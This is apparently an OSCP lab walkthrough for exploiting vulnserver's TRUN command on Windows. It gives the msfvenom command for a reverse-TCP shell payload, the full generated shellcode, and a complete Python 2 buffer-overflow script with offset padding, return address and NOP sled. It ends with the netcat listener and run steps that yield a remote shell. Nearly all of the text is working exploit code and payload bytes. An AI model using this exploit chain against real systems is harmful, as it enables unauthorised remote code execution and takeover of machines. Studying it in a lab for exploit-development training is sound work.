OSCP Security Technology - Generating Shellcode & Gaining Root

OSCP Security Technology - Generating Shellcode & Gaining Root

Generate the shellcode. (Note: LHOST is the Kali Linux machine's IP address.)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"

image-20210627202658912

"\xda\xcd\xd9\x74\x24\xf4\xbf\x1e\xa7\x4b\x98\x5a\x2b\xc9\xb1"
"\x52\x31\x7a\x17\x83\xc2\x04\x03\x64\xb4\xa9\x6d\x64\x52\xaf"
"\x8e\x94\xa3\xd0\x07\x71\x92\xd0\x7c\xf2\x85\xe0\xf7\x56\x2a"
"\x8a\x5a\x42\xb9\xfe\x72\x65\x0a\xb4\xa4\x48\x8b\xe5\x95\xcb"
"\x0f\xf4\xc9\x2b\x31\x37\x1c\x2a\x76\x2a\xed\x7e\x2f\x20\x40"
"\x6e\x44\x7c\x59\x05\x16\x90\xd9\xfa\xef\x93\xc8\xad\x64\xca"
"\xca\x4c\xa8\x66\x43\x56\xad\x43\x1d\xed\x05\x3f\x9c\x27\x54"
"\xc0\x33\x06\x58\x33\x4d\x4f\x5f\xac\x38\xb9\xa3\x51\x3b\x7e"
"\xd9\x8d\xce\x64\x79\x45\x68\x40\x7b\x8a\xef\x03\x77\x67\x7b"
"\x4b\x94\x76\xa8\xe0\xa0\xf3\x4f\x26\x21\x47\x74\xe2\x69\x13"
"\x15\xb3\xd7\xf2\x2a\xa3\xb7\xab\x8e\xa8\x5a\xbf\xa2\xf3\x32"
"\x0c\x8f\x0b\xc3\x1a\x98\x78\xf1\x85\x32\x16\xb9\x4e\x9d\xe1"
"\xbe\x64\x59\x7d\x41\x87\x9a\x54\x86\xd3\xca\xce\x2f\x5c\x81"
"\x0e\xcf\x89\x06\x5e\x7f\x62\xe7\x0e\x3f\xd2\x8f\x44\xb0\x0d"
"\xaf\x67\x1a\x26\x5a\x92\xcd\x89\x33\x9e\x15\x62\x46\x9e\x34"
"\x2e\xcf\x78\x5c\xde\x99\xd3\xc9\x47\x80\xaf\x68\x87\x1e\xca"
"\xab\x03\xad\x2b\x65\xe4\xd8\x3f\x12\x04\x97\x1d\xb5\x1b\x0d"
"\x09\x59\x89\xca\xc9\x14\xb2\x44\x9e\x71\x04\x9d\x4a\x6c\x3f"
"\x37\x68\x6d\xd9\x70\x28\xaa\x1a\x7e\xb1\x3f\x26\xa4\xa1\xf9"
"\xa7\xe0\x95\x55\xfe\xbe\x43\x10\xa8\x70\x3d\xca\x07\xdb\xa9"
"\x8b\x6b\xdc\xaf\x93\xa1\xaa\x4f\x25\x1c\xeb\x70\x8a\xc8\xfb"
"\x09\xf6\x68\x03\xc0\xb2\x89\xe6\xc0\xce\x21\xbf\x81\x72\x2c"
"\x40\x7c\xb0\x49\xc3\x74\x49\xae\xdb\xfd\x4c\xea\x5b\xee\x3c"
"\x63\x0e\x10\x92\x84\x1b"

Write the exploit script.

nano exploit.py
chmod 777 exploit.py
#!/usr/bin/python
# Python 2 script (note the `print` statement syntax below). It builds one
# TRUN request for the service listening on 192.168.2.21:9999 (vulnserver,
# per the write-up) and sends it once over a TCP socket.
import socket
import sys  # imported but not used anywhere in this script

# Payload bytes copied verbatim from the msfvenom output above
# (-f c output, encoded with -b "\x00" so the string contains no NUL byte).
exploit = (
"\xda\xcd\xd9\x74\x24\xf4\xbf\x1e\xa7\x4b\x98\x5a\x2b\xc9\xb1"
"\x52\x31\x7a\x17\x83\xc2\x04\x03\x64\xb4\xa9\x6d\x64\x52\xaf"
"\x8e\x94\xa3\xd0\x07\x71\x92\xd0\x7c\xf2\x85\xe0\xf7\x56\x2a"
"\x8a\x5a\x42\xb9\xfe\x72\x65\x0a\xb4\xa4\x48\x8b\xe5\x95\xcb"
"\x0f\xf4\xc9\x2b\x31\x37\x1c\x2a\x76\x2a\xed\x7e\x2f\x20\x40"
"\x6e\x44\x7c\x59\x05\x16\x90\xd9\xfa\xef\x93\xc8\xad\x64\xca"
"\xca\x4c\xa8\x66\x43\x56\xad\x43\x1d\xed\x05\x3f\x9c\x27\x54"
"\xc0\x33\x06\x58\x33\x4d\x4f\x5f\xac\x38\xb9\xa3\x51\x3b\x7e"
"\xd9\x8d\xce\x64\x79\x45\x68\x40\x7b\x8a\xef\x03\x77\x67\x7b"
"\x4b\x94\x76\xa8\xe0\xa0\xf3\x4f\x26\x21\x47\x74\xe2\x69\x13"
"\x15\xb3\xd7\xf2\x2a\xa3\xb7\xab\x8e\xa8\x5a\xbf\xa2\xf3\x32"
"\x0c\x8f\x0b\xc3\x1a\x98\x78\xf1\x85\x32\x16\xb9\x4e\x9d\xe1"
"\xbe\x64\x59\x7d\x41\x87\x9a\x54\x86\xd3\xca\xce\x2f\x5c\x81"
"\x0e\xcf\x89\x06\x5e\x7f\x62\xe7\x0e\x3f\xd2\x8f\x44\xb0\x0d"
"\xaf\x67\x1a\x26\x5a\x92\xcd\x89\x33\x9e\x15\x62\x46\x9e\x34"
"\x2e\xcf\x78\x5c\xde\x99\xd3\xc9\x47\x80\xaf\x68\x87\x1e\xca"
"\xab\x03\xad\x2b\x65\xe4\xd8\x3f\x12\x04\x97\x1d\xb5\x1b\x0d"
"\x09\x59\x89\xca\xc9\x14\xb2\x44\x9e\x71\x04\x9d\x4a\x6c\x3f"
"\x37\x68\x6d\xd9\x70\x28\xaa\x1a\x7e\xb1\x3f\x26\xa4\xa1\xf9"
"\xa7\xe0\x95\x55\xfe\xbe\x43\x10\xa8\x70\x3d\xca\x07\xdb\xa9"
"\x8b\x6b\xdc\xaf\x93\xa1\xaa\x4f\x25\x1c\xeb\x70\x8a\xc8\xfb"
"\x09\xf6\x68\x03\xc0\xb2\x89\xe6\xc0\xce\x21\xbf\x81\x72\x2c"
"\x40\x7c\xb0\x49\xc3\x74\x49\xae\xdb\xfd\x4c\xea\x5b\xee\x3c"
"\x63\x0e\x10\x92\x84\x1b")

# Request body, left to right: 2003 filler bytes, one fixed 4-byte value
# (its role is not stated on this page -- check the debugger session the
# screenshots refer to), 32 x86 NOP bytes (\x90), then the payload above.
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + exploit

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    # socket.connect() returns None, so `connect` carries nothing and is unused.
    connect=s.connect(('192.168.2.21',9999))
    # NOTE(review): send() may transmit only part of the buffer; sendall()
    # delivers all of it. This is a Python 2 str, so no encoding step is needed.
    s.send(('TRUN /.:/' + shellcode))
except:
    # Bare except: every failure (refused connection, timeout, even
    # KeyboardInterrupt) collapses into this one message, so the real
    # cause is never shown.
    print "check debugger" 
# Reached on both the success and the failure path; not in a `finally`,
# but nothing between the except block and here can raise.
s.close()

Run the vulnserver and then run the exploit script.

nc -nvlp 4444

./exploit.py

image-20210627200903029

image-20210627202757022
